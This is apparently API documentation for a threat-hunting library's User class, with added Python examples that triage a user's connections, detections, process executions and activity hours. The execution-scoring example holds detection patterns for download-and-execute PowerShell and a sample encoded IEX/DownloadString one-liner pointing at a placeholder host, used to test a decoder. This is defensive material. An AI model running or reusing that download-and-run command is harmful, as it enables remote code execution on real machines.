User

class TH.User(users: str, client_id: str, period: Optional[TH.Core.period.TimePeriod] = TimePeriod())

Bases: Generic[TH.Core.THCollection.T]

Class representing a user.
A user is instantiated by providing the following information:
  • users: Name of the target user

  • client_id: The client identification code

  • period: The current analysis period

User creation example (a raw string keeps the backslash in the domain qualifier from being read as a Python escape sequence):

u = User(users=r'MYDOMAIN\myusername', client_id='000000')

get_bandwidth(muid=None, period=None)
Obtain the bandwidth used by this user
The default representation of bandwidth data is an area chart with the values per day
Parameters
  • muid – Limit results to machines in this list

  • period – Query time period. Defaults to today

Returns

Data frame with the resulting bandwidth data

Following columns are provided within the returned dataframe:

  • Date: Date for the bandwidth consumption data

  • Outgoing: MBytes sent

  • Incoming: MBytes received

get_blocked(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]

Obtain the user's blocked elements

Parameters
  • muid – Limit the query results to certain machines

  • file – Limit the query results to certain files (providing File objects)

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

The user's blocked elements, represented as a list of Block instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:
  • DateTime: Date of the detection

  • ClientId: Target client

  • Muid: Target machine

  • LoggedUser: User that performed the detected action

  • ChildMd5: File hash for the detected file

  • ChildPath: File path for the detected file

  • ChildFilename: File name for the detected file

  • ParentMd5: File hash for the parent process file

  • ParentPath: File path for the parent process file

  • ParentFilename: File name for the parent process file

  • WinningTech: Winning technology (the one that performed the detection)

  • DetectionId: Detection identification code

  • Action: Performed action over the file

get_communications(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, protocol: Optional[str] = None, port: Optional[str] = None, iptype: Optional[str] = None, direction: Optional[str] = None, ips: Optional[str] = None, top: Optional[int] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]
Obtain the user's communications
The default representation of a user's communications through the print_dataframe() method is a world
map with coloured dots placed by geolocation of the remote IP addresses
Parameters
  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • muid – Limit the query results to certain source machines

  • file – Limit the query results to certain files (providing File objects)

  • protocol – Limit the query result to certain protocols (‘ICMP’, ‘IGMP’, ‘RFCOMM’, ‘TCP’, ‘RDP’, ‘UDP’, ‘ICMPV6’, ‘RM’)

  • port – Limit the query result to certain ports (port = number or one of [‘FTP’, ‘SSH’, ‘TELNET’, ‘SMTP’, ‘HTTP’, ‘POP3’, ‘HTTPS’, ‘RDP’])

  • iptype – Limit the query result to certain IP type (iptype = ‘Public’|’Private’)

  • direction – Limit the query result to certain direction (direction = ‘Incoming’|’Outgoing’)

  • ips – Limit the query results to certain ip addresses

  • top – Limit the query result to certain number of rows

Returns

The user's communications, represented as a list of Connection instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:
  • DateTime: Date and time of the connection

  • Date: Date of the connection

  • Muid: Machine for the connection

  • LoggedUser: User affected by the connection

  • ParentFilename: Process (name) affected by the connection

  • ParentPid: Process (pid) affected by the connection

  • RemoteIp: The remote IP address

  • RemotePort: Connection port

  • LocalIp: The local IP of the machine when the connection was established

  • LocalPort: The local port

  • Protocol: The communication protocol

  • Direction: Incoming / Outgoing

  • Ipv4Status: Internal / External
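Worked example (added here; it is not part of the TH library or of this page): triaging a communications frame after it has been pulled back. The rows below are constructed in the column layout documented above; against the live API the same list comes from u.get_communications(...).to_dict('records'). The set of "sensitive" service ports and the choice to treat an Incoming row's LocalPort as the service port are this example's assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample rows in the column layout documented for
# User.get_communications(). With the live API the same list comes from
#   rows = u.get_communications(period=p).to_dict('records')
# 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges used here as
# stand-ins for Internet hosts; the Ipv4Status column marks them External.
SAMPLE_CONNECTIONS = [
    {"DateTime": "2021-03-01 09:12:03", "Date": "2021-03-01", "Muid": "MUID-1",
     "LoggedUser": "MYDOMAIN\\alice", "ParentFilename": "chrome.exe", "ParentPid": 4120,
     "RemoteIp": "198.51.100.10", "RemotePort": 443, "LocalIp": "10.0.0.15",
     "LocalPort": 50112, "Protocol": "TCP", "Direction": "Outgoing", "Ipv4Status": "External"},
    {"DateTime": "2021-03-01 09:40:51", "Date": "2021-03-01", "Muid": "MUID-1",
     "LoggedUser": "MYDOMAIN\\alice", "ParentFilename": "mstsc.exe", "ParentPid": 5210,
     "RemoteIp": "203.0.113.77", "RemotePort": 3389, "LocalIp": "10.0.0.15",
     "LocalPort": 50201, "Protocol": "TCP", "Direction": "Outgoing", "Ipv4Status": "External"},
    {"DateTime": "2021-03-01 10:02:17", "Date": "2021-03-01", "Muid": "MUID-1",
     "LoggedUser": "MYDOMAIN\\alice", "ParentFilename": "explorer.exe", "ParentPid": 1880,
     "RemoteIp": "10.0.0.2", "RemotePort": 445, "LocalIp": "10.0.0.15",
     "LocalPort": 50230, "Protocol": "TCP", "Direction": "Outgoing", "Ipv4Status": "Internal"},
    {"DateTime": "2021-03-01 23:15:44", "Date": "2021-03-01", "Muid": "MUID-2",
     "LoggedUser": "MYDOMAIN\\alice", "ParentFilename": "svchost.exe", "ParentPid": 912,
     "RemoteIp": "203.0.113.9", "RemotePort": 51822, "LocalIp": "10.0.0.21",
     "LocalPort": 3389, "Protocol": "TCP", "Direction": "Incoming", "Ipv4Status": "External"},
]

# Services a workstation user is not expected to reach on the Internet, or to
# expose to it. This selection is the example's assumption, not an API constant.
SENSITIVE_PORTS = {21: "FTP", 22: "SSH", 23: "TELNET", 445: "SMB", 3389: "RDP", 5985: "WinRM"}


def is_external(row):
    """Prefer the Ipv4Status column; fall back to the address itself when it is absent."""
    status = row.get("Ipv4Status")
    if status in ("External", "Internal"):
        return status == "External"
    try:
        return not ip_address(row["RemoteIp"]).is_private
    except ValueError:
        return False


def service_port(row):
    """The port that names the service: the remote port for outbound connections,
    the local (listening) port for inbound ones."""
    return int(row["LocalPort"] if row["Direction"] == "Incoming" else row["RemotePort"])


def triage_connections(rows, sensitive=SENSITIVE_PORTS):
    """Flag Internet-facing use of sensitive services and collect external peers per process.

    Returns (findings, peers): findings are the flagged rows with a 'reason' key added,
    in input order; peers maps (Muid, ParentFilename) to the set of external RemoteIp
    values that process exchanged traffic with.
    """
    findings, peers = [], defaultdict(set)
    for row in rows:
        if not is_external(row):
            continue
        peers[(row["Muid"], row["ParentFilename"])].add(row["RemoteIp"])
        port = service_port(row)
        if port in sensitive:
            verb = "exposed to" if row["Direction"] == "Incoming" else "used towards"
            findings.append({**row, "reason": f"{sensitive[port]} {verb} Internet host {row['RemoteIp']}"})
    return findings, dict(peers)


if __name__ == "__main__":
    found, peers = triage_connections(SAMPLE_CONNECTIONS)
    for f in found:
        print(f["DateTime"], f["Muid"], f["ParentFilename"], f["reason"])
    for (muid, proc), ips in sorted(peers.items()):
        print(muid, proc, sorted(ips))
```

Filtering server-side with direction=, iptype= and port= is cheaper than pulling everything back; the routine above is for the residual rows that still have to be read, and the per-process set of external peers is what gets handed to a reputation lookup.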

get_detections(muid: Optional[Union[List[str], str]] = None, file: Optional[Union[str, List[str], Any, List[Any]]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]

Obtain the user's detections

Parameters
  • muid – Limit the query results to certain machines

  • file – Limit the query results to certain files (providing File objects)

  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

The user's detections, represented as a list of Detect instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:
  • DateTime: Date of the detection

  • ClientId: Target client

  • Muid: Target machine

  • LoggedUser: User that performed the detected action

  • ChildMd5: File hash for the detected file

  • ChildPath: File path for the detected file

  • ChildFilename: File name for the detected file

  • ParentMd5: File hash for the parent process file

  • ParentPath: File path for the parent process file

  • ParentFilename: File name for the parent process file

  • WinningTech: Winning technology (the one that performed the detection)

  • DetectionId: Detection identification code

  • Action: Performed action over the file
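Worked example (added here; not code from the TH library or this page): get_blocked() and get_detections() return the same columns, so one grouping routine serves both. It pivots the rows by ChildMd5 to show how far a given file has spread across the user's machines, which parent dropped or launched it, and which technology caught it. The sample rows are constructed; the Action values 'Block' and 'Report' are placeholders, since the page does not enumerate that column's values.

```python
from collections import Counter, defaultdict

HASH_A, HASH_B = "aa" * 16, "bb" * 16  # placeholder MD5 values for the sample rows

# Constructed sample rows in the column layout shared by get_blocked() and
# get_detections(). With the live API:
#   rows = (u.get_detections(period=p).to_dict('records')
#           + u.get_blocked(period=p).to_dict('records'))
# The Action values are placeholders; the page does not enumerate that column.
SAMPLE_DETECTIONS = [
    {"DateTime": "2021-03-02 08:01:10", "ClientId": "000000", "Muid": "MUID-1",
     "LoggedUser": "MYDOMAIN\\alice", "ChildMd5": HASH_A,
     "ChildPath": "C:\\Users\\alice\\Downloads\\invoice.exe", "ChildFilename": "invoice.exe",
     "ParentMd5": "cc" * 16, "ParentPath": "C:\\Program Files\\Microsoft Office\\outlook.exe",
     "ParentFilename": "outlook.exe", "WinningTech": "Cloud", "DetectionId": "D-1", "Action": "Block"},
    {"DateTime": "2021-03-02 08:14:32", "ClientId": "000000", "Muid": "MUID-2",
     "LoggedUser": "MYDOMAIN\\alice", "ChildMd5": HASH_A,
     "ChildPath": "\\\\FILESRV\\share\\invoice.exe", "ChildFilename": "invoice.exe",
     "ParentMd5": "dd" * 16, "ParentPath": "C:\\Windows\\explorer.exe",
     "ParentFilename": "explorer.exe", "WinningTech": "Local", "DetectionId": "D-2", "Action": "Block"},
    {"DateTime": "2021-03-02 09:02:05", "ClientId": "000000", "Muid": "MUID-3",
     "LoggedUser": "MYDOMAIN\\alice", "ChildMd5": HASH_A,
     "ChildPath": "\\\\FILESRV\\share\\invoice.exe", "ChildFilename": "invoice.exe",
     "ParentMd5": "dd" * 16, "ParentPath": "C:\\Windows\\explorer.exe",
     "ParentFilename": "explorer.exe", "WinningTech": "Local", "DetectionId": "D-3", "Action": "Report"},
    {"DateTime": "2021-03-02 11:45:00", "ClientId": "000000", "Muid": "MUID-1",
     "LoggedUser": "MYDOMAIN\\alice", "ChildMd5": HASH_B,
     "ChildPath": "C:\\Temp\\tool.exe", "ChildFilename": "tool.exe",
     "ParentMd5": "ee" * 16, "ParentPath": "C:\\Windows\\System32\\cmd.exe",
     "ParentFilename": "cmd.exe", "WinningTech": "Local", "DetectionId": "D-4", "Action": "Block"},
]


def spread_by_hash(rows):
    """Group detections by ChildMd5 and summarise where, how and when each file was seen.

    DateTime values are compared as strings, which is correct for the
    'YYYY-MM-DD HH:MM:SS' layout used in the sample."""
    by_hash = defaultdict(lambda: {"machines": set(), "users": set(), "parents": set(),
                                   "paths": set(), "techs": Counter(), "actions": Counter(),
                                   "first_seen": None, "last_seen": None})
    for row in rows:
        e = by_hash[row["ChildMd5"]]
        e["machines"].add(row["Muid"])
        e["users"].add(row["LoggedUser"])
        e["parents"].add(row["ParentFilename"])
        e["paths"].add(row["ChildPath"])
        e["techs"][row["WinningTech"]] += 1
        e["actions"][row["Action"]] += 1
        ts = row["DateTime"]
        e["first_seen"] = ts if e["first_seen"] is None else min(e["first_seen"], ts)
        e["last_seen"] = ts if e["last_seen"] is None else max(e["last_seen"], ts)
    return dict(by_hash)


def spreading_hashes(rows, min_machines=2):
    """Hashes seen on at least min_machines distinct machines, widest spread first,
    earliest first_seen breaking ties."""
    hits = [(md5, e) for md5, e in spread_by_hash(rows).items() if len(e["machines"]) >= min_machines]
    return sorted(hits, key=lambda kv: (-len(kv[1]["machines"]), kv[1]["first_seen"]))


if __name__ == "__main__":
    for md5, e in spreading_hashes(SAMPLE_DETECTIONS):
        print(md5, sorted(e["machines"]), sorted(e["parents"]), dict(e["techs"]), dict(e["actions"]),
              e["first_seen"], "->", e["last_seen"])
```

The first_seen machine and its parent process are where the file entered the user's sessions; the paths set shows whether later copies came from a share, which is the usual sign that the user carried it between machines rather than each machine being hit independently.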

get_executions(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[Union[List[str], str]] = None, operation: Optional[Union[List[str], str]] = None, attributes: Optional[Union[List[str], str]] = None, command: Optional[Union[List[str], str]] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[TH.Core.THCollection.THCollection, pandas.core.frame.DataFrame]
Obtain user’s actions over processes
Parameters
  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the results to those actions affecting provided file (providing File objects)

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘kill’, ‘thread’, ‘load’]

  • attributes – Limit the results by the operation attributes (OR’ed values of [ATTR_REMOTE, ATTR_EXTERNAL, ATTR_FRESHUNKNOWN, ATTR_LANSHARED])

  • command – Limit results to those containing the given command line

Available operations are:

  • create: Process creation operations

  • kill: Kill process operations

  • thread: Remote threads creation operations

  • load: Load library operations

Returns

The user's process actions in the period, as a list of Process instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned Process instances:
  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

  • RemoteSession: True if action is performed from a remote session

  • External: The file comes from outside

  • FreshUnknown: This file is new along Panda community

  • LanShared: The file comes from outside the machine but inside the local network (a LAN share)
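Worked example (added here; not code from the TH library or this page) for get_executions(); get_files() returns the same columns, so the scorer applies to both. It post-filters the rows with a few analyst rules: an Office application spawning an interpreter, remote thread creation, encoded or download-style PowerShell command lines (decoded when an -EncodedCommand argument is present), and fresh-unknown binaries that arrived from outside the machine. The rule weights, the application lists and the sample rows are this example's assumptions. Where the library's kind=, operation= and attributes= filters express the same condition, use them first; the rules here are for what those filters cannot express, such as the parent/child pairing.

```python
import base64
import re

# Application classes used by the rules. These lists are the example's assumptions.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line markers typical of download-and-execute PowerShell one-liners.
SUSPICIOUS_CMD = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|"
    r"-nop\b|-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,})")
ENCODED_ARG = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})")

# Constructed sample: the encoded payload is built here so the decoder can be checked.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Rows in the column layout documented for get_executions() (get_files() shares it).
# With the live API: rows = u.get_executions(period=p).to_dict('records')
SAMPLE_EXECUTIONS = [
    {"DateTime": "2021-03-01 10:05:12", "Muid": "MUID-1", "LoggedUser": "MYDOMAIN\\alice",
     "ChildFilename": "powershell.exe",
     "ChildPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ChildMd5": "11" * 16, "ChildPid": 6120, "ParentFilename": "winword.exe", "ParentMd5": "22" * 16,
     "ParentPid": 5040, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
     "RemoteIp": None, "Operation": "create", "RemoteSession": False, "External": False,
     "FreshUnknown": False, "LanShared": False},
    {"DateTime": "2021-03-01 10:06:40", "Muid": "MUID-1", "LoggedUser": "MYDOMAIN\\alice",
     "ChildFilename": "chrome.exe",
     "ChildPath": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "ChildMd5": "33" * 16, "ChildPid": 6200, "ParentFilename": "explorer.exe", "ParentMd5": "44" * 16,
     "ParentPid": 1880, "CommandLine": '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"',
     "RemoteIp": None, "Operation": "create", "RemoteSession": False, "External": False,
     "FreshUnknown": False, "LanShared": False},
    {"DateTime": "2021-03-01 10:09:03", "Muid": "MUID-1", "LoggedUser": "MYDOMAIN\\alice",
     "ChildFilename": "lsass.exe", "ChildPath": "C:\\Windows\\System32\\lsass.exe",
     "ChildMd5": "55" * 16, "ChildPid": 700, "ParentFilename": "rundll32.exe", "ParentMd5": "66" * 16,
     "ParentPid": 6340, "CommandLine": "", "RemoteIp": None, "Operation": "thread",
     "RemoteSession": False, "External": False, "FreshUnknown": False, "LanShared": False},
    {"DateTime": "2021-03-01 14:30:27", "Muid": "MUID-2", "LoggedUser": "MYDOMAIN\\alice",
     "ChildFilename": "setup.exe", "ChildPath": "C:\\Users\\alice\\Downloads\\setup.exe",
     "ChildMd5": "77" * 16, "ChildPid": 3120, "ParentFilename": "explorer.exe", "ParentMd5": "44" * 16,
     "ParentPid": 2210, "CommandLine": "setup.exe /S", "RemoteIp": "10.0.0.40", "Operation": "create",
     "RemoteSession": True, "External": True, "FreshUnknown": True, "LanShared": False},
]


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_execution(row):
    """Apply the rules to one row; returns (score, reasons). Weights are this example's."""
    reasons = []
    child = (row.get("ChildFilename") or "").lower()
    parent = (row.get("ParentFilename") or "").lower()
    cmd = row.get("CommandLine") or ""
    op = row.get("Operation")
    if op == "create" and parent in OFFICE_APPS and child in INTERPRETERS:
        reasons.append(("office application spawned an interpreter", 4))
    if op == "thread":
        reasons.append((f"remote thread created in {child}", 3))
    if SUSPICIOUS_CMD.search(cmd):
        reasons.append(("suspicious command-line markers", 3))
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append((f"encoded command decodes to: {decoded[:80]}", 2))
    if row.get("FreshUnknown") and (row.get("External") or row.get("LanShared")):
        reasons.append(("new-to-community binary that arrived from outside the machine", 2))
    if row.get("RemoteSession"):
        reasons.append(("performed from a remote session", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def triage_executions(rows, threshold=3):
    """Rows scoring at or above threshold as (score, row, reasons), highest first."""
    scored = []
    for row in rows:
        score, reasons = score_execution(row)
        if score >= threshold:
            scored.append((score, row, reasons))
    return sorted(scored, key=lambda t: -t[0])


if __name__ == "__main__":
    for score, row, reasons in triage_executions(SAMPLE_EXECUTIONS):
        print(score, row["DateTime"], row["Muid"], row["ParentFilename"], "->", row["ChildFilename"])
        for r in reasons:
            print("   ", r)
```

The decoder matters more than the regex: an encoded command line carries nothing the markers can match, so without decoding the only signal left is the -enc switch itself.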

get_files(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[str] = None, operation: Optional[str] = None, attributes: Optional[str] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[TH.Core.histogram.Histogram, TH.Core.THCollection.THCollection]
Obtain user’s actions over files
Parameters
  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the results to those actions affecting provided file

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘modify’, ‘delete’, ‘rename’, ‘folder’, ‘newcmp’, ‘opencmp’, ‘access’, ‘script’]

  • attributes – Limit the results by the operation attributes (OR’ed values of [ATTR_REMOTE, ATTR_EXTERNAL, ATTR_FRESHUNKNOWN, ATTR_LANSHARED])

Available operations are:

  • create: File (PE) creation operations

  • modify: File (PE) modification operations

  • delete: File (PE) deletion operations

  • rename: File (PE) rename operations

  • folder: Folder creation operations

  • newcmp: CMP files creation operations

  • opencmp: CMP files open operations

  • access: Data access operations

  • script: Operations over non-PE / script files

Returns

The user's file actions in the period, as a list of File instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned File instances:
  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

  • RemoteSession: True if action is performed from a remote session

  • External: The file comes from outside

  • FreshUnknown: This file is new along Panda community

  • LanShared: The file comes from outside (inside the local network)

get_machines(period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[pandas.core.frame.DataFrame, Any]
Obtain machines where User was logged in
Parameters
  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

Returns

A list of machines represented as Machine instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:
  • Muid: The MUID for the returned machine

get_registry(file: Optional[Union[str, List[str], Any, List[Any]]] = None, muid: Optional[Union[List[str], str]] = None, kind: Optional[str] = None, operation: Optional[str] = None, period: Optional[TH.Core.period.TimePeriod] = None, histogram: Optional[TH.Core.histogram.Histogram] = None) -> Union[pandas.core.frame.DataFrame, TH.Core.THCollection.THCollection]
Obtain user’s actions over registry keys
Parameters
  • period – Query time period. Defaults to today

  • histogram – Set if the histogram over the data is required (defaults to None)

  • file – Limit the query results to certain files (providing File objects)

  • muid – Limit the results to those actions affecting provided machines

  • kind – Limit results by the application type [‘interpreter’, ‘remoteaccess’, ‘admintool’, ‘hackingtool’] or action [‘userallowed’]

  • operation – Limit results by the operation type [‘create’, ‘modify’, ‘access’]

Available operations are:

  • create: Registry key creation operations

  • modify: Registry key modification operations

Returns

The user's registry actions in the period, as a list of Registry instances.

If histogram is required, returning values depends on the provided histogram configuration.
Otherwise, following columns are provided within the returned dataframe:
  • DateTime: timestamp for the operation

  • Muid: Target machine

  • LoggedUser: User that performed the logged action

  • ChildFilename: Child process (name)

  • ChildPath: Child process (path)

  • ChildMd5: Child process (file md5 hash)

  • ChildPid: Child Process (pid)

  • ParentFilename: Parent process (name)

  • ParentMd5: Parent process (file md5 hash)

  • ParentPid: Parent Process (pid)

  • CommandLine: Command line for process creation events

  • RemoteIp: Origin IP for file creation events from remote machines

  • Operation: Operation type

get_timetable(muid: Optional[Union[List[str], str]] = None, period: Optional[TH.Core.period.TimePeriod] = None) -> pandas.core.frame.DataFrame
Obtain the distribution of user actions over time (hours per weekday)
The default representation for the timetable is a heatmap with coloured cells per weekday and hour
Parameters
  • period – Query time period. Defaults to today

  • muid – Limit results to machines in this list

Returns

Dataframe with the distribution of actions over time

Following columns are provided within the returned dataframe:

  • LoggedUser: The user under analysis

  • Weekday: The analyzed weekday [1..7]

  • Hour: The analyzed hour [0..23]

  • AvgActions: The average number of actions (any kind) in the analyzed weekday and hour

  • StdActions: The standard deviation of actions (any kind) in the analyzed weekday and hour
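Worked example (added here; not code from the TH library or this page): using the AvgActions/StdActions baseline from get_timetable() to flag activity at times the user is not normally active, by bucketing the DateTime column of any other get_*() frame into the same weekday/hour slots and computing a z-score against the baseline. The sample baseline and events are constructed; Weekday numbering is assumed to be ISO (1 = Monday, 7 = Sunday), since the page only states the range [1..7]; the z-score threshold and the standard-deviation floor are this example's choices.

```python
from collections import Counter
from datetime import datetime


def build_sample_timetable(user="MYDOMAIN\\alice"):
    """Constructed baseline in the get_timetable() column layout: busy Monday to Friday
    08:00-17:59, nearly idle otherwise. Live data: u.get_timetable(period=p).to_dict('records')."""
    rows = []
    for weekday in range(1, 8):          # ISO numbering assumed: 1 = Monday ... 7 = Sunday
        for hour in range(24):
            working = weekday <= 5 and 8 <= hour < 18
            rows.append({"LoggedUser": user, "Weekday": weekday, "Hour": hour,
                         "AvgActions": 40.0 if working else 0.2,
                         "StdActions": 8.0 if working else 0.5})
    return rows


def build_sample_events():
    """Constructed DateTime values as any get_*() frame returns them: three events during
    a normal Monday morning (2021-03-01) and six at 03:00 on the following Sunday."""
    stamps = ["2021-03-01 10:05:00", "2021-03-01 10:20:00", "2021-03-01 10:41:00"]
    stamps += [f"2021-03-07 03:{m:02d}:00" for m in (2, 9, 15, 21, 33, 48)]
    return [{"DateTime": s} for s in stamps]


def baseline_index(timetable_rows):
    """Map (Weekday, Hour) -> (AvgActions, StdActions)."""
    return {(int(r["Weekday"]), int(r["Hour"])): (float(r["AvgActions"]), float(r["StdActions"]))
            for r in timetable_rows}


def bucket_events(event_rows, fmt="%Y-%m-%d %H:%M:%S"):
    """Count events into (weekday, hour) slots using the same ISO weekday numbering."""
    counts = Counter()
    for r in event_rows:
        ts = datetime.strptime(r["DateTime"], fmt)
        counts[(ts.isoweekday(), ts.hour)] += 1
    return counts


def flag_anomalous_slots(baseline, observed, z_threshold=3.0, std_floor=1.0):
    """Slots where the observed count exceeds the baseline mean by more than z_threshold
    standard deviations, as (weekday, hour, observed, avg, z), largest z first.
    std_floor keeps a near-zero StdActions in quiet slots from turning one stray
    event into a finding; a slot missing from the baseline counts as mean 0."""
    flagged = []
    for slot, n in observed.items():
        avg, std = baseline.get(slot, (0.0, 0.0))
        z = (n - avg) / max(std, std_floor)
        if z > z_threshold:
            flagged.append((slot[0], slot[1], n, avg, round(z, 2)))
    return sorted(flagged, key=lambda t: -t[4])


if __name__ == "__main__":
    baseline = baseline_index(build_sample_timetable())
    observed = bucket_events(build_sample_events())
    for weekday, hour, n, avg, z in flag_anomalous_slots(baseline, observed):
        print(f"weekday {weekday} {hour:02d}:00  observed={n} baseline={avg} z={z}")
```

Build the baseline from a longer period than the one being inspected (a month of timetable against a day of events), otherwise the events under inspection are also part of the mean they are compared against.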

property name
Returns

The name of this user